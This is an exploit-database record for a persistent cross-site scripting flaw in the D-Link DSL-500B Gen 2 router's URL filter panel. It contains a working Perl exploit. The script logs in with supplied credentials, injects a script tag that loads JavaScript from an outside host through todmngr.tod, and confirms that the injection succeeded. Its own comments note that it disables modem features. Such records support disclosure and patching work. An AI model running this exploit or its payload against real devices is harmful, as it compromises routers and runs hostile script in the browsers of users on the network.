ID

VAR-E-201311-0047

CVE

EDB ID

36988

TITLE

D-Link DSL-500B Gen 2 - URL Filter Configuration Panel Persistent Cross-Site Scripting - Hardware webapps Exploit

DESCRIPTION

D-Link DSL-500B Gen 2 - URL Filter Configuration Panel Persistent Cross-Site Scripting. CVE-2013-5223CVE-99603 . webapps exploit for Hardware platform

AFFECTED PRODUCTS

EXPLOIT

#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod URL Filter
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;

my $ip = $ARGV[0];

my $user = $ARGV[1];

my $pass = $ARGV[2];

if (@ARGV != 3){

print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";

}else{

$ip = $1 if($ip=~/(.*)\/$/);

print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";

my $payload = "%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E";

my $ua = new LWP::UserAgent;

my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );

$hdrs->authorization_basic($user, $pass);

chomp($ip);

print "[+] Preparing exploit...\n";

my $url_and_xpl = "$ip/todmngr.tod?action=set_url&TodUrlAdd=GameOver$payload&port_num=1234";

my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

print "[+] Prepared!\n";

print "[+] Requesting and Exploiting...\n";

my $resp = $ua->request($req);

if ($resp->is_success){

print "[+] Successfully Requested!\n";


my $url = "$ip/todmngr.tod?action=urlview";

$req = new HTTP::Request("GET",$url,$hdrs);

print "[+] Checking that was explored...\n";


my $resp2 = $ua->request($req);


if ($resp2->is_success){

my $resultado = $resp2->as_string;

if(index($resultado, uri_unescape($payload)) != -1){

print "[+] Successfully Exploited!";

}else{

print "[-] Not Exploited!";

}
}

}else {

print "[-] Ops!\n";
print $resp->message;

}

}

EXPLOIT LANGUAGE

pl

PRICE

free

TYPE

URL Filter Configuration Panel Persistent Cross-Site Scripting

TAGS

CREDITS

XLabs Security

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:49:46.281000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE